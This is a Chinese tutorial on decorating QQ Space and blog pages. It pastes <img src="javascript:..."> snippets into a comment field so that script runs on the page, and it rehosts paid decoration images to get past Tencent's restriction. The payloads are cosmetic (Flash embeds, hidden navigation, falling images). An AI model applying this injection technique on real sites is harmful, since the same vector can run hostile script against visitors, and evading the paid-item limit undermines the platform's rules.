<img src="javascript:document.getElementById('Mlogo').innerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'http://www.qqjia.com/learn/qq2005/q-zone/jia2.swf\';;;;;;;; quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'65\' TYPE=\'application/x-shockwave-flash\'></div>';">

如果你想将原来的导航条去掉，请看清除导航条代码：
<img src="javascript:bt_1.style.display='none';bt_2.style.display='none';bt_3.style.display='none';bt_4.style.display='none';bt_5.style.display='none';bt_6.style.display='none';bt_7.style.display='none';bt_8.style.display='none';" style="display:none;">
假如有人只想去掉其中一个或多个导航，可以这样改，举个例子：比如去掉迷你屋，按顺序来排的话迷你屋的序号是6，所以，可以将代码改成：
<img src="javascript:bt_6.style.display='none'" style="display:none;">

如果你想将设置顶部图片去掉，腾出空间放导航条，可用请看代码：
<img src="javascript:Mlogo.style.filter='alpha(opacity=0)';">
注意：去掉以后就看不到“自定义”三个字了，如果你想修改QQ空间的话，就朝大概的那个位置点移动鼠标，看见鼠标变成了可以点击的图案就可以了。不要告诉我你大概都不在哪里吧？

如果想重新显示导航条和顶部图片，将代码删除就可以了。

以下是笔者整理出来的QQ空间的部分FLASH导航条，欢迎大家选用：
http://www.qqjia.com/learn/qq2005/q-zone/t1.swf
http://www.qqjia.com/learn/qq2005/q-zone/t2.swf
http://www.qqjia.com/learn/qq2005/q-zone/t3.swf
http://www.qqjia.com/learn/qq2005/q-zone/t4.swf
http://www.qqjia.com/learn/qq2005/q-zone/t5.swf
http://www.qqjia.com/learn/qq2005/q-zone/t6.swf
http://www.qqjia.com/learn/qq2005/q-zone/m1.swf
http://www.qqjia.com/learn/qq2005/q-zone/m2.swf
http://www.qqjia.com/learn/qq2005/q-zone/m3.swf
http://www.qqjia.com/learn/qq2005/q-zone/m4.swf
http://www.qqjia.com/learn/qq2005/q-zone/m5.swf
http://www.qqjia.com/learn/qq2005/q-zone/m6.swf

使用方法：
在空间首页选择自定义，再点建立新模块，然后把代码写在“评论”这一栏里，其他的可以全部不填。可以参考里QQ空间皮肤代码里的使用说明，是一样的。
3.QQ空间代码之QQ空间透明Flash背景代码
先来看全屏显示的FLASH的代码：

<img src="javascript:document.getElementById('Mlogo').innerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'地址\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';">
WIDTH：透明FLASH宽度
HEIGHT：透明FLASH高度
top：透明FLASH与空间顶端的距离
left：透明FLASH与空间左端的距离

以上参数可根据FLASH的大小和位置以及在QQ空间出现的地方调整，不过要想全屏显示的就话就用上面的参数就可以了。这个代码里其实和QQ空间导航代码里的是一样的，只是用途不同，找到合适的FLASH地址就可以了。这个地址去那里找呢？网上有很多，我找了一个做示范，看这个地址：http://qqjia.com/learn/qq2005/q-zone/bk.swf，那么代码就是：

<img src="javascript:document.getElementById('Mlogo').innerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'http://qqjia.com/learn/qq2005/q-zone/bk.swf\';;;;;;;; quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';">

以下是笔者整理出来的QQ空间的部分透明FLASH地址，就不介绍了，大家自己看，喜欢就拿去。
http://imgfree.21cn.com/free/flash/1.swf
http://imgfree.21cn.com/free/flash/2.swf
http://imgfree.21cn.com/free/flash/3.swf
http://imgfree.21cn.com/free/flash/36.swf 性感的唇
http://imgfree.21cn.com/free/flash/42.swf 蒲公英
http://imgfree.21cn.com/free/flash/25.swf 蚂蚁
http://imgfree.21cn.com/free/flash/29.swf 蓝色的水
http://imgfree.21cn.com/free/flash/23.swf 雪花飘
http://imgfree.21cn.com/free/flash/41.swf 雪花飘
http://imgfree.21cn.com/free/flash/40.swf
http://imgfree.21cn.com/free/flash/45.swf
http://imgfree.21cn.com/free/flash/46.swf
http://imgfree.21cn.com/free/flash/53.swf
http://imgfree.21cn.com/free/flash/33.swf
http://imgfree.21cn.com/free/flash/51.swf
http://imgfree.21cn.com/free/flash/52.swf 枫叶飘
http://imgfree.21cn.com/free/flash/53.swf
http://imgfree.21cn.com/free/flash/54.swf 黑客帝国
http://imgfree.21cn.com/free/flash/57.swf
http://imgfree.21cn.com/free/flash/58.swf
http://imgfree.21cn.com/free/flash/59.swf
http://imgfree.21cn.com/free/flash/61.swf 心
http://imgfree.21cn.com/free/flash/62.swf 烟花
http://imgfree.21cn.com/free/flash/63.swf
http://imgfree.21cn.com/free/flash/64.swf
http://imgfree.21cn.com/free/flash/66.swf 漂亮
http://imgfree.21cn.com/free/flash/68.swf
http://imgfree.21cn.com/free/flash/69.swf
http://imgfree.21cn.com/free/flash/70.swf
http://imgfree.21cn.com/free/flash/71.swf
http://imgfree.21cn.com/free/flash/73.swf
http://imgfree.21cn.com/free/flash/74.swf
http://imgfree.21cn.com/free/flash/75.swf 跟着鼠标动的烟火
http://imgfree.21cn.com/free/flash/77.swf
http://imgfree.21cn.com/free/flash/78.swf 时间
http://imgfree.21cn.com/free/flash/80.swf
http://imgfree.21cn.com/free/flash/81.swf 火
http://imgfree.21cn.com/free/flash/84.swf
http://imgfree.21cn.com/free/flash/85.swf
http://imgfree.21cn.com/free/flash/86.swf
http://imgfree.21cn.com/free/flash/97.swf
http://imgfree.21cn.com/free/flash/107.swf
http://imgfree.21cn.com/free/flash/108.swf
http://imgfree.21cn.com/free/flash/110.swf
http://imgfree.21cn.com/free/flash/113.swf
http://imgfree.21cn.com/free/flash/115.swf 跟着鼠标走的鱼
http://imgfree.21cn.com/free/flash/117.swf
http://imgfree.21cn.com/free/flash/119.swf
http://imgfree.21cn.com/free/flash/121.swf
http://imgfree.21cn.com/free/flash/123.swf
http://imgfree.21cn.com/free/flash/126.swf
http://imgfree.21cn.com/free/flash/128.swf 眼镜
http://imgfree.21cn.com/free/flash/129.swf 下雨了
http://imgfree.21cn.com/free/flash/130.swf 跟着鼠标的白色花
http://imgfree.21cn.com/free/flash/131.swf 枫叶
http://imgfree.21cn.com/free/flash/132.swf
http://imgfree.21cn.com/free/flash/136.swf

使用方法：
在空间首页选择自定义，再点建立新模块，然后把代码写在“评论”这一栏里，其他的可以全部不填。可以参考里QQ空间皮肤代码里的使用说明，是一样的
空间代码使用步骤：

1、去掉不要的模块：

“自定义”--“个性设置”--“模块管理”点了之后有一个窗口出来，把不想显示的模块前的“√”去掉，然后“提交”，如果你想要原来的默认设置，这个步骤可以省略。

2、新建一个模块：

“自定义”--“个性设置”--“新建模块”点了之后有一个窗口出来，是给模块起名字的，这个你自己想了，例如“代码”。起好模块名字，“提交”后就出另外一个窗口了。

3、填代码：

在这个新出来的窗口里找到“评论”这个项，在里面填入以上代码。（图片栏和地址栏的http如果不需要可以删除）

4、保存！

5、继续填加代码：

如果还有其他代码填加，增加一个项目就可以了，点击“＋”就可以继续添加其他代码。

6、修改或删除代码：

点击“修改”或“删除”就可以了。注意：有的代码添加后再修改会出现无法加入的现象，建议删除后再添加。

7、隐藏代码模块：

添加鼠标、挂件、导航的等这些代码的模块是不需要显示的，怎么样把它隐藏起来呢？有的网友在“模块管理”里把它去掉了，这样是看不见了，但是代码的效果也没有了。把它隐藏起来有两个方法。

一个是把它放到边上去，这样就看不到了。在“自定义”模式下，用鼠标左键点这模块不放，移动鼠标，把该模块拖到边上去。看右图，这是拖到右边一半的效果，继续往里面移动就可以了。

另一个方法是用其他大的模块把这个小的模块遮住，方法同上，移动到大模块后面去就可以了。

如果隐藏了模块后想修改又拖拉不出来，可以使用“还原默认”恢复，或者删除这个模块后再添加。

费添加QQ空间漂浮物代码（2006年2月21日测试可用）：

<img src="javascript:var num=3;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3665_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">

参数说明（红字部分）：
num=3：漂浮物图片的数量
e=8：QQ空间出现的漂浮物数量，数值越大就越多，请不要超过64个，否则会很慢了。
http://qqjia.com/learn/q-zone/piao/3665_：图片文件的地址

　　下面将举例说明如何获得图片文件的地址：

　　①打开“装扮空间” → ②打开“小装饰” → ③选择漂浮物 → ④在漂浮物图片上点右键。在弹出的“属性”窗口就可以看到图片文件的路径。http://imgcache.qq.com/qzone/item/pre/1/3665.gif

　　但是这个不是漂浮物图案的地址，要把 pre 改为 orig ：
　　例如：http://imgcache.qq.com/qzone/item/pre/1/3665.gif　（商场装扮空间里的漂浮物展示的地址）
　　改为：http://imgcache.qq.com/qzone/item/orig/1/3665.gif （这个打不开）

　　但是打不开，为什么呢？原来图片不只一个，改为：
http://imgcache.qq.com/qzone/item/orig/1/3665_1.gif　（实际的漂浮物图片1地址）
http://imgcache.qq.com/qzone/item/orig/1/3665_2.gif　（实际的漂浮物图片2地址）
http://imgcache.qq.com/qzone/item/orig/1/3665_3.gif　（实际的漂浮物图片3地址）
http://imgcache.qq.com/qzone/item/orig/1/3665_4.gif　（这个打不开了）
　　第四个就打不开了，说明这个漂浮物只有三个图片，所以 num=3 。

　　注意：由于腾讯QQ空间方面做了限制，通过以上方法得到的漂浮物图片地址如果直接用到代码里面是无法显示的。

　　免费的东西难道又没得用了？有一个方法，如果我们把漂浮物图片文件下载下来，上传到别的网页空间再调出来，是可以显示的。例如上面这个，上传到本站，得到地址：
http://qqjia.com/learn/q-zone/piao/3665_1.gif
http://qqjia.com/learn/q-zone/piao/3665_2.gif
http://qqjia.com/learn/q-zone/piao/3665_3.gif

　　所以就得到了以上的代码，大家可以用以上方法下载了QQ空间里的漂浮物图片文件后上传到免费的网页空间去（例如个人主页、论坛、博客、相册等）得到图片文件的地址。如果你都不会，请看 用QQ相册打造免费QQ空间皮肤和挂件 ，该代码为网友友情提供，有问题请给他去信 aiqqpk@126.com，

　　以下是公子整理出来的部分QQ空间漂浮物图案及代码，欢迎大家选用（点击小图看大图）：

　<img src="javascript:var num=3;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3665_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">

　<img src="javascript:var num=3;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/222_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">

　<img src="javascript:var num=3;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/2818_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">

　<img src="javascript:var num=4;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3070_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">

　<img src="javascript:var num=5;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3499_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">

　<img src="javascript:var num=4;var e=8;for(i=0; i<e;i++){ if(top.si[i]) { top.si[i].style.visibility=''; var P=Math.floor(Math.random()*num); top.si [i].src='http://qqjia.com/learn/q-zone/piao/3671_'+(P+1)+'.gif'; } } top.g_FallingMode=0; start_Falling(); new CFloat ('5','','0','3');">


使用方法：
　　在空间首页选择自定义，再点建立新模块，然后把代码写在“评论”这一栏里，其他的可以全部不填。可以参考里QQ空间皮肤代码里的使用说明，是一样的。

JAY导航标 <img src="javascript:document.getElementById('Mlogo').&#105;nnerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'/Files/flash/jay.swf\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave- flash\'></div>';">  其他导航标 /Files/qqkj/flash/1.swf /Files/qqkj/flash/2.swf /Files/qqkj/flash/3.swf /Files/qqkj/flash/4.swf /Files/qqkj/flash/5.swf /Files/qqkj/flash/6.swf /Files/qqkj/flash/7.swf /Files/qqkj/flash/8.swf /Files/qqkj/flash/9.swf /Files/qqkj/flash/10.swf /Files/qqkj/flash/11.swf /Files/qqkj/flash/12.swf /Files/qqkj/flash/13.swf /Files/qqkj/flash/14.swf /Files/qqkj/flash/15.swf /Files/qqkj/flash/16.swf /Files/qqkj/flash/17.swf /Files/qqkj/flash/18.swf /Files/qqkj/flash/19.swf /Files/qqkj/flash/20.swf /Files/qqkj/flash/21.swf /Files/qqkj/flash/22.swf /Files/qqkj/flash/23.swf /Files/qqkj/flash/24.swf /Files/qqkj/flash/25.swf /Files/qqkj/flash/26.swf /Files/qqkj/flash/27.swf /Files/qqkj/flash/28.swf /Files/qqkj/flash/29.swf 50条flash导航地址为   http://815668.5151j.cn/qzone/1.swf  http://815668.5151j.cn/qzone/2.swf  http://815668.5151j.cn/qzone/3.swf  http://815668.5151j.cn/qzone/4.swf  http://815668.5151j.cn/qzone/5.swf  http://815668.5151j.cn/qzone/6.swf  http://815668.5151j.cn/qzone/7.swf  http://815668.5151j.cn/qzone/8.swf  http://815668.5151j.cn/qzone/9.swf  http://815668.5151j.cn/qzone/10.swf  http://815668.5151j.cn/qzone/11.swf  http://815668.5151j.cn/qzone/12.swf  http://815668.5151j.cn/qzone/13.swf  http://815668.5151j.cn/qzone/14.swf  http://815668.5151j.cn/qzone/15.swf  http://815668.5151j.cn/qzone/16.swf  http://815668.5151j.cn/qzone/17.swf  http://815668.5151j.cn/qzone/18.swf    www.aiqqpk.56.com http://815668.5151j.cn/qzone/19.swf  http://815668.5151j.cn/qzone/20.swf  http://815668.5151j.cn/qzone/21.swf  http://815668.5151j.cn/qzone/22.swf  http://815668.5151j.cn/qzone/23.swf  http://815668.5151j.cn/qzone/24.swf  http://815668.5151j.cn/qzone/25.swf  http://815668.5151j.cn/qzone/26.swf  http://815668.5151j.cn/qzone/27.swf  http://815668.5151j.cn/qzone/28.swf  http://815668.5151j.cn/qzone/29.swf    www.qq5120.com http://815668.5151j.cn/qzone/30.swf  http://815668.5151j.cn/qzone/31.swf  http://815668.5151j.cn/qzone/32.swf  http://815668.5151j.cn/qzone/33.swf  http://815668.5151j.cn/qzone/34.swf  http://815668.5151j.cn/qzone/35.swf  http://815668.5151j.cn/qzone/36.swf  http://815668.5151j.cn/qzone/37.swf  http://815668.5151j.cn/qzone/38.swf  http://815668.5151j.cn/qzone/39.swf  http://815668.5151j.cn/qzone/40.swf  http://815668.5151j.cn/qzone/41.swf  http://815668.5151j.cn/qzone/42.swf

 

博客代码

大家都对博客情有独衷，把一些代码发上来，希望大家的博客越做越好
如果你想在自己的页面添加这样的效果，可以建立一个新的＂自定义空白面板＂，将＂显示源代码＂画勾后，在版面上复制粘贴此代码：<CENTER><EMBED style="LEFT: 10px; POSITION: absolute; TOP: -70px" align=right src=FLASH的网址 width=700 height=400 type=application/x-shockwave-flash wmode="transparent" quality="high" ;></CENTER>
然后取消勾＂显示源代码＂恢复编辑状态，给新面板起个新名字后完成．最后在＂控制面板＂中＂定制首页＂项添加新的＂自定义面板＂即可。
如果想在新文章使用此效果，可以在文章编辑时将＂显示源代码＂勾后将代码复制粘贴后恢复即可。
如果想使用多个或多次效果，将不同代码粘贴或粘贴几次就可以了。
你可以试着调整这两个参数：width=700 height=400
透明Flash 地址
透明水珠 http://lain1978.com/collection/flash/008.swf
黄色花瓣 http://lain1978.com/collection/flash/007.swf
红心 http://lain1978.com/collection/flash/006.swf
蓝色雪花 http://lain1978.com/collection/flash/005.swf
冰淇淋 http://lain1978.com/collection/flash/e-icecream.swf
海底世界 http://lain1978.com/collection/flash/e-summertube.swf
 

怎么添加背景音乐？
进入控制面版----首页内容维护----公告栏设置----勾选显示代码（这个是关键）
在公告栏编辑区输入以下代码（能正常播放的代码，字体必须为默认字体样式,颜色为黑色，不要擅自添加任何字体特效）
<embed src=音乐链接地址 width=0 height=0 type=audio/mpeg loop="true" autostart="false">
支持的音乐格式: wma　mp3　rm　ra　ram　asf　mid.
width和height为播放器宽度和高度,可以灵活设置,如果播放视频,可以设置到适合的数字.我设的是200和50
autostart="true"为自动播放,autostart="false"为不自动播放.
loop="true"为连续循环播放,loop="false"为不循环播放.
loop可以等于一个整数,比如loop="3",就是音乐循环播放3次.
如果你想别人一打开网页就能听到你的背景音乐，并且是循环播放的，那么就可以这样。

怎样可以在BLOG中出现有水珠的效果?

建立一个空白面板，在显示源代码的状态下，把下面的代码粘贴进去：
<EMBED style="WIDTH: 378px; HEIGHT: 238px" src=http://www.kiaclub.cn/dvbbs/Images/sd.swf width=378 height=238 type=application/x-shockwave-flash wmode="transparent">
宽和高你可以自己调整。 

如何在博客中插入天气预报和FLASH时钟？

新建空白面版，进入“原代码编辑”，插入以下代码即可。
<IFRAME src="http://weather.qq.com/inc/ss125.htm" frameBorder=0 width=200 scrolling=no height=240></IFRAME>

FLASH时钟跟插入FLASH一样。代码格式
<div align="center"><embed src="FLASH地址" width="180" height="180" type="application/x-shockwave-flash" /></div>

FLASH时钟可以到http://www.fengzhuju.com/page-00s/wzgg/clocks.htm里挑。
挑好了复制地址（都是.swf结尾的）替代上面的“FLASH地址就行”。
注意，存放FLASH的服务器的快慢影响你的博客浏览速度。